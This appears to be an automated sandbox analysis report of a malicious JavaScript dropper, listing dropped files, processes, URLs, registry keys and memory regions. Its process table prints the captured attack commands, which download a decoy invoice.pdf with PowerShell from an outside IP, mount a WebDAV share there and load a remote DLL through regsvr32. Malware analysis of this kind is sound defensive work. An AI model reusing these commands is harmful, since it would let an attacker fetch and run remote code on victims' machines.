Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
1647911459241874440.js
|
ASCII text, with very long lines (37780), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Temp\invoice.pdf
|
PDF document, version 1.7
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage user DataBase, version 0x620, checksum 0x3af259e3, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\6f698d8c-43f4-4c16-85a5-35b621941830.tmp
|
JSON data
|
modified
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
|
data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
|
SQLite 3.x database, last written using SQLite version 3040000, file counter 11, database pages 21, cookie 0x5, schema 4,
UTF-8, version-valid-for 11
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal
|
SQLite Rollback Journal
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
|
Certificate, Version=3
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
|
data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)
|
PostScript document text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.6548
|
PostScript document text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)
|
PostScript document text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.6548
|
PostScript document text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
|
SQLite 3.x database, last written using SQLite version 3040000, file counter 24, database pages 3, cookie 0x2, schema 4, UTF-8,
version-valid-for 24
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal
|
SQLite Rollback Journal
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSIc8e96.LOG
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pnzol34r.4s2.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t5zmemlc.pxp.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-15 14-42-06-494.log
|
ASCII text, with very long lines (393)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
|
ASCII text, with very long lines (393), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\436bc9ec-c6d2-4955-b51b-44f3c70b935c.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\538ad473-cd6b-4bfc-9554-b524a241774c.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\5c516a6a-5836-4d72-aafd-e369d95bb857.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\9077dea9-3573-47ef-ae75-73a3fad485ba.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
|
dropped
|
||
|
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
There are 47 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1647911459241874440.js"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf
http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd
/c regsvr32 /s \\193.143.1.205@8888\davwwwroot\32586295023593.dll
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd /c net use \\193.143.1.205@8888\davwwwroot\
|
|
|
|
C:\Windows\System32\net.exe
|
net use \\193.143.1.205@8888\davwwwroot\
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\invoice.pdf"
|
||
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService
--lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0"
--lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log"
--mojo-platform-channel-handle=2112 --field-trial-handle=1588,i,10440249036511766134,9373202045153823086,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker
/prefetch:8
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://193.143.1.205/invoice.php
|
193.143.1.205
|
||
|
https://g.live.com/odclientsettings/ProdV21C:
|
unknown
|
||
|
http://crl.ver)
|
unknown
|
||
|
http://x1.i.lencr.org/
|
unknown
|
||
|
https://g.live.com/odclientsettings/Prod1C:
|
unknown
|
||
|
http://193.143.1.205:8888/
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
bg.microsoft.map.fastly.net
|
199.232.210.172
|
||
|
x1.i.lencr.org
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
193.143.1.205
|
unknown
|
unknown
|
|
|
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
|
JScriptSetScriptStateStarted
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.ApplicationCompany
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
There are 9 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1618513A000
|
heap
|
page read and write
|
||
|
161834C0000
|
heap
|
page read and write
|
||
|
24A3BC97000
|
heap
|
page read and write
|
||
|
1618511B000
|
heap
|
page read and write
|
||
|
CA92EFB000
|
stack
|
page read and write
|
||
|
24A4106E000
|
trusted library allocation
|
page read and write
|
||
|
CA932FE000
|
unkown
|
page readonly
|
||
|
24A3BCBE000
|
heap
|
page read and write
|
||
|
1618511B000
|
heap
|
page read and write
|
||
|
35F1DFE000
|
stack
|
page read and write
|
||
|
B6F34FF000
|
stack
|
page read and write
|
||
|
161850D6000
|
heap
|
page read and write
|
||
|
161850C9000
|
heap
|
page read and write
|
||
|
24A412DF000
|
heap
|
page read and write
|
||
|
24A41302000
|
heap
|
page read and write
|
||
|
24A3BC5B000
|
heap
|
page read and write
|
||
|
161850E4000
|
heap
|
page read and write
|
||
|
16183410000
|
heap
|
page read and write
|
||
|
24A410F0000
|
trusted library allocation
|
page read and write
|
||
|
161833D0000
|
heap
|
page read and write
|
||
|
CA924F7000
|
stack
|
page read and write
|
||
|
CA940FE000
|
unkown
|
page readonly
|
||
|
278DC2F0000
|
heap
|
page read and write
|
||
|
16183417000
|
heap
|
page read and write
|
||
|
161850CF000
|
heap
|
page read and write
|
||
|
24A41200000
|
heap
|
page read and write
|
||
|
1618511B000
|
heap
|
page read and write
|
||
|
CA939FB000
|
stack
|
page read and write
|
||
|
35F18FD000
|
stack
|
page read and write
|
||
|
16185111000
|
heap
|
page read and write
|
||
|
16183370000
|
heap
|
page read and write
|
||
|
24A412EA000
|
heap
|
page read and write
|
||
|
161850D8000
|
heap
|
page read and write
|
||
|
CA925FE000
|
unkown
|
page readonly
|
||
|
24A3C500000
|
heap
|
page read and write
|
||
|
161850EC000
|
heap
|
page read and write
|
||
|
24A412C7000
|
heap
|
page read and write
|
||
|
161850C3000
|
heap
|
page read and write
|
||
|
24A4121F000
|
heap
|
page read and write
|
||
|
24A3C415000
|
heap
|
page read and write
|
||
|
24A3BCA2000
|
heap
|
page read and write
|
||
|
24A3C51A000
|
heap
|
page read and write
|
||
|
24A3BC00000
|
heap
|
page read and write
|
||
|
35F20FE000
|
stack
|
page read and write
|
||
|
24A3BB70000
|
trusted library section
|
page read and write
|
||
|
16183411000
|
heap
|
page read and write
|
||
|
278DC500000
|
heap
|
page read and write
|
||
|
16183400000
|
heap
|
page read and write
|
||
|
16185108000
|
heap
|
page read and write
|
||
|
278DC200000
|
heap
|
page read and write
|
||
|
278DC2AC000
|
heap
|
page read and write
|
||
|
278DC2D7000
|
heap
|
page read and write
|
||
|
161850F8000
|
heap
|
page read and write
|
||
|
24A411B0000
|
remote allocation
|
page read and write
|
||
|
1618513A000
|
heap
|
page read and write
|
||
|
16185139000
|
heap
|
page read and write
|
||
|
161850DC000
|
heap
|
page read and write
|
||
|
CA91F1B000
|
stack
|
page read and write
|
||
|
16185118000
|
heap
|
page read and write
|
||
|
24A412BF000
|
heap
|
page read and write
|
||
|
24A3C402000
|
heap
|
page read and write
|
||
|
278DC2EB000
|
heap
|
page read and write
|
||
|
24A4122C000
|
heap
|
page read and write
|
||
|
161850C4000
|
heap
|
page read and write
|
||
|
16183457000
|
heap
|
page read and write
|
||
|
CA92BFE000
|
unkown
|
page readonly
|
||
|
278DC2E4000
|
heap
|
page read and write
|
||
|
161850C2000
|
heap
|
page read and write
|
||
|
1618511B000
|
heap
|
page read and write
|
||
|
24A3CA80000
|
trusted library section
|
page readonly
|
||
|
24A3BCB1000
|
heap
|
page read and write
|
||
|
16185104000
|
heap
|
page read and write
|
||
|
24A41054000
|
trusted library allocation
|
page read and write
|
||
|
1618339B000
|
heap
|
page read and write
|
||
|
16185108000
|
heap
|
page read and write
|
||
|
24A3C940000
|
trusted library allocation
|
page read and write
|
||
|
161833D0000
|
heap
|
page read and write
|
||
|
24A41300000
|
heap
|
page read and write
|
||
|
16185108000
|
heap
|
page read and write
|
||
|
B6F347A000
|
stack
|
page read and write
|
||
|
24A41010000
|
trusted library allocation
|
page read and write
|
||
|
161850CF000
|
heap
|
page read and write
|
||
|
16185149000
|
heap
|
page read and write
|
||
|
CA9337E000
|
stack
|
page read and write
|
||
|
24A410E0000
|
trusted library allocation
|
page read and write
|
||
|
CA933FE000
|
unkown
|
page readonly
|
||
|
24A3BC73000
|
heap
|
page read and write
|
||
|
CA938FE000
|
unkown
|
page readonly
|
||
|
24A41304000
|
heap
|
page read and write
|
||
|
16185137000
|
heap
|
page read and write
|
||
|
35F19FE000
|
stack
|
page read and write
|
||
|
24A3C3E0000
|
trusted library allocation
|
page read and write
|
||
|
161850C4000
|
heap
|
page read and write
|
||
|
24A41000000
|
trusted library allocation
|
page read and write
|
||
|
1618511B000
|
heap
|
page read and write
|
||
|
1618511B000
|
heap
|
page read and write
|
||
|
24A3C513000
|
heap
|
page read and write
|
||
|
1618511B000
|
heap
|
page read and write
|
||
|
24A3BCB7000
|
heap
|
page read and write
|
||
|
16185108000
|
heap
|
page read and write
|
||
|
24A3CB80000
|
trusted library allocation
|
page read and write
|
||
|
16185118000
|
heap
|
page read and write
|
||
|
278DC250000
|
remote allocation
|
page read and write
|
||
|
24A411B0000
|
remote allocation
|
page read and write
|
||
|
24A40FF0000
|
trusted library allocation
|
page read and write
|
||
|
161850E9000
|
heap
|
page read and write
|
||
|
161850D1000
|
heap
|
page read and write
|
||
|
161850F8000
|
heap
|
page read and write
|
||
|
16185113000
|
heap
|
page read and write
|
||
|
161833C4000
|
heap
|
page read and write
|
||
|
24A3CA40000
|
trusted library section
|
page readonly
|
||
|
161835D9000
|
heap
|
page read and write
|
||
|
24A3BD02000
|
heap
|
page read and write
|
||
|
24A3BC13000
|
heap
|
page read and write
|
||
|
161850D7000
|
heap
|
page read and write
|
||
|
24A3BC78000
|
heap
|
page read and write
|
||
|
161850D2000
|
heap
|
page read and write
|
||
|
24A412E3000
|
heap
|
page read and write
|
||
|
161835D0000
|
heap
|
page read and write
|
||
|
1618513A000
|
heap
|
page read and write
|
||
|
1618342A000
|
heap
|
page read and write
|
||
|
24A3C400000
|
heap
|
page read and write
|
||
|
24A412FE000
|
heap
|
page read and write
|
||
|
35F22FB000
|
stack
|
page read and write
|
||
|
CA92FFE000
|
unkown
|
page readonly
|
||
|
1618511B000
|
heap
|
page read and write
|
||
|
278DC2EB000
|
heap
|
page read and write
|
||
|
CA936FE000
|
unkown
|
page readonly
|
||
|
161850F1000
|
heap
|
page read and write
|
||
|
161850C0000
|
heap
|
page read and write
|
||
|
161850D3000
|
heap
|
page read and write
|
||
|
CA92CFC000
|
stack
|
page read and write
|
||
|
16185110000
|
heap
|
page read and write
|
||
|
CA92DFE000
|
unkown
|
page readonly
|
||
|
24A3C601000
|
trusted library allocation
|
page read and write
|
||
|
24A3BD29000
|
heap
|
page read and write
|
||
|
278DC2C2000
|
heap
|
page read and write
|
||
|
161850CD000
|
heap
|
page read and write
|
||
|
CA935FE000
|
unkown
|
page readonly
|
||
|
24A41160000
|
trusted library allocation
|
page read and write
|
||
|
CA9407E000
|
stack
|
page read and write
|
||
|
161850CC000
|
heap
|
page read and write
|
||
|
1618340E000
|
heap
|
page read and write
|
||
|
161833B2000
|
heap
|
page read and write
|
||
|
24A41040000
|
trusted library allocation
|
page read and write
|
||
|
161850F8000
|
heap
|
page read and write
|
||
|
161850CD000
|
heap
|
page read and write
|
||
|
24A3BC8D000
|
heap
|
page read and write
|
||
|
1618339C000
|
heap
|
page read and write
|
||
|
1618511B000
|
heap
|
page read and write
|
||
|
CA92AFA000
|
stack
|
page read and write
|
||
|
24A3C502000
|
heap
|
page read and write
|
||
|
161850FC000
|
heap
|
page read and write
|
||
|
24A3CA70000
|
trusted library section
|
page readonly
|
||
|
24A41030000
|
trusted library allocation
|
page read and write
|
||
|
278DC2C2000
|
heap
|
page read and write
|
||
|
16185109000
|
heap
|
page read and write
|
||
|
278DC505000
|
heap
|
page read and write
|
||
|
24A3BB30000
|
heap
|
page read and write
|
||
|
24A3BB60000
|
trusted library allocation
|
page read and write
|
||
|
24A3C3C1000
|
trusted library allocation
|
page read and write
|
||
|
1618513B000
|
heap
|
page read and write
|
||
|
278DC250000
|
remote allocation
|
page read and write
|
||
|
24A3CFA0000
|
trusted library allocation
|
page read and write
|
||
|
161850D0000
|
heap
|
page read and write
|
||
|
16183400000
|
heap
|
page read and write
|
||
|
24A42000000
|
heap
|
page read and write
|
||
|
CA928FB000
|
stack
|
page read and write
|
||
|
1618511B000
|
heap
|
page read and write
|
||
|
161850D9000
|
heap
|
page read and write
|
||
|
161850D0000
|
heap
|
page read and write
|
||
|
161832E0000
|
heap
|
page read and write
|
||
|
35F1FFE000
|
stack
|
page read and write
|
||
|
24A3CA60000
|
trusted library section
|
page readonly
|
||
|
16185137000
|
heap
|
page read and write
|
||
|
CA9327E000
|
stack
|
page read and write
|
||
|
1618342A000
|
heap
|
page read and write
|
||
|
24A41050000
|
trusted library allocation
|
page read and write
|
||
|
CA9317E000
|
stack
|
page read and write
|
||
|
161850CC000
|
heap
|
page read and write
|
||
|
278DC2DF000
|
heap
|
page read and write
|
||
|
35F1BFE000
|
stack
|
page read and write
|
||
|
24A41150000
|
trusted library allocation
|
page read and write
|
||
|
24A41160000
|
trusted library allocation
|
page read and write
|
||
|
278DC2E5000
|
heap
|
page read and write
|
||
|
161835D5000
|
heap
|
page read and write
|
||
|
B6F36FF000
|
stack
|
page read and write
|
||
|
CA9347E000
|
stack
|
page read and write
|
||
|
B6F367E000
|
stack
|
page read and write
|
||
|
24A3BC90000
|
heap
|
page read and write
|
||
|
CA930FE000
|
unkown
|
page readonly
|
||
|
24A4124F000
|
heap
|
page read and write
|
||
|
24A41261000
|
heap
|
page read and write
|
||
|
24A41011000
|
trusted library allocation
|
page read and write
|
||
|
278DC100000
|
heap
|
page read and write
|
||
|
1618511B000
|
heap
|
page read and write
|
||
|
24A3BD00000
|
heap
|
page read and write
|
||
|
24A3CA50000
|
trusted library section
|
page readonly
|
||
|
24A412FC000
|
heap
|
page read and write
|
||
|
1618511B000
|
heap
|
page read and write
|
||
|
1618513B000
|
heap
|
page read and write
|
||
|
1618340F000
|
heap
|
page read and write
|
||
|
24A3C3F0000
|
trusted library allocation
|
page read and write
|
||
|
161835DE000
|
heap
|
page read and write
|
||
|
278DC2D7000
|
heap
|
page read and write
|
||
|
16183400000
|
heap
|
page read and write
|
||
|
1618511B000
|
heap
|
page read and write
|
||
|
16183418000
|
heap
|
page read and write
|
||
|
161831E0000
|
heap
|
page read and write
|
||
|
278DC1E0000
|
heap
|
page read and write
|
||
|
35F14DA000
|
stack
|
page read and write
|
||
|
278DC2BB000
|
heap
|
page read and write
|
||
|
278DC288000
|
heap
|
page read and write
|
||
|
24A412F5000
|
heap
|
page read and write
|
||
|
1618513A000
|
heap
|
page read and write
|
||
|
1618342A000
|
heap
|
page read and write
|
||
|
24A41010000
|
trusted library allocation
|
page read and write
|
||
|
24A3BD13000
|
heap
|
page read and write
|
||
|
161835DA000
|
heap
|
page read and write
|
||
|
24A4130A000
|
heap
|
page read and write
|
||
|
278DC250000
|
remote allocation
|
page read and write
|
||
|
1618513B000
|
heap
|
page read and write
|
||
|
24A41170000
|
trusted library allocation
|
page read and write
|
||
|
161850CA000
|
heap
|
page read and write
|
||
|
161850D4000
|
heap
|
page read and write
|
||
|
1618511B000
|
heap
|
page read and write
|
||
|
278DC2B3000
|
heap
|
page read and write
|
||
|
1618511C000
|
heap
|
page read and write
|
||
|
24A41040000
|
trusted library allocation
|
page read and write
|
||
|
278DC2EB000
|
heap
|
page read and write
|
||
|
CA927FE000
|
unkown
|
page readonly
|
||
|
24A3BC29000
|
heap
|
page read and write
|
||
|
278DC2B7000
|
heap
|
page read and write
|
||
|
161850C8000
|
heap
|
page read and write
|
||
|
CA9357E000
|
stack
|
page read and write
|
||
|
24A3BA30000
|
heap
|
page read and write
|
||
|
16185110000
|
heap
|
page read and write
|
||
|
B6F357F000
|
stack
|
page read and write
|
||
|
161850D0000
|
heap
|
page read and write
|
||
|
24A3BA50000
|
heap
|
page read and write
|
||
|
161835DD000
|
heap
|
page read and write
|
||
|
16185149000
|
heap
|
page read and write
|
||
|
CA93AFE000
|
unkown
|
page readonly
|
||
|
161850D4000
|
heap
|
page read and write
|
||
|
CA9367D000
|
stack
|
page read and write
|
||
|
B6F35FC000
|
stack
|
page read and write
|
||
|
24A410E0000
|
trusted library allocation
|
page read and write
|
||
|
1618511B000
|
heap
|
page read and write
|
||
|
24A3CA90000
|
trusted library section
|
page readonly
|
||
|
16185149000
|
heap
|
page read and write
|
||
|
1618513A000
|
heap
|
page read and write
|
||
|
24A3BC2B000
|
heap
|
page read and write
|
||
|
24A411B0000
|
remote allocation
|
page read and write
|
||
|
278DC280000
|
heap
|
page read and write
|
||
|
24A41242000
|
heap
|
page read and write
|
||
|
161850F4000
|
heap
|
page read and write
|
||
|
278DC2B7000
|
heap
|
page read and write
|
||
|
CA931FE000
|
unkown
|
page readonly
|
||
|
35F1EFE000
|
stack
|
page read and write
|
||
|
16183400000
|
heap
|
page read and write
|
||
|
24A41140000
|
trusted library allocation
|
page read and write
|
||
|
161832C0000
|
heap
|
page read and write
|
||
|
CA937F9000
|
stack
|
page read and write
|
||
|
24A412F9000
|
heap
|
page read and write
|
||
|
161833E1000
|
heap
|
page read and write
|
||
|
1618510F000
|
heap
|
page read and write
|
||
|
16185149000
|
heap
|
page read and write
|
||
|
16183379000
|
heap
|
page read and write
|
||
|
CA926FE000
|
stack
|
page read and write
|
||
|
16185149000
|
heap
|
page read and write
|
||
|
161850DC000
|
heap
|
page read and write
|
||
|
24A4128F000
|
heap
|
page read and write
|
||
|
24A3C51A000
|
heap
|
page read and write
|
||
|
24A3BC3F000
|
heap
|
page read and write
|
||
|
278DC2F0000
|
heap
|
page read and write
|
||
|
CA929FE000
|
unkown
|
page readonly
|
||
|
278DC2AC000
|
heap
|
page read and write
|
||
|
1618511B000
|
heap
|
page read and write
|
||
|
CA9307E000
|
stack
|
page read and write
|
||
|
CA934FE000
|
unkown
|
page readonly
|
||
|
161850E5000
|
heap
|
page read and write
|
||
|
1618510F000
|
heap
|
page read and write
|
||
|
24A3BC7B000
|
heap
|
page read and write
|
||
|
24A3BC92000
|
heap
|
page read and write
|
||
|
278DC2F0000
|
heap
|
page read and write
|
||
|
16185149000
|
heap
|
page read and write
|
||
|
278DC2DD000
|
heap
|
page read and write
|
||
|
16185149000
|
heap
|
page read and write
|
||
|
161850D0000
|
heap
|
page read and write
|
